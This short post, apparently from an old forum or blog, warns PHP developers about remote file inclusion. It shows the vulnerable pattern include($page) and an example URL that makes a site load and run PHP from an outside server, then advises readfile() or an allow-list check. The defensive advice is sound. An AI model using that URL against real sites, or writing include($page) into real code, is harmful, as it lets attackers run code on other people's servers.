Here's a little advice for any fellow PHP-scripters out there, I've noticed this on several sites now (starting with Tonie.net).

If you're using include() in your scripts, be careful you don't literally use a parameter in your urls to include local files. Include() can load and execute any PHP commands from any other server. For example, if your url looks like this:

   index.php?page=news.html

and your script does this:

   include($page);

people can write a textfile with any php commands they want and execute them on your server by simply using this url:

   index.php?page=http://someserver/php.txt


Solution: if the page you're including doesn't need to execute any php commands, use readfile(). This function will simply print the contents of the file as-is. And if your genuine include file does contain some php, try implementing some sort of if-else condition to make sure only those files get included that you want to be included.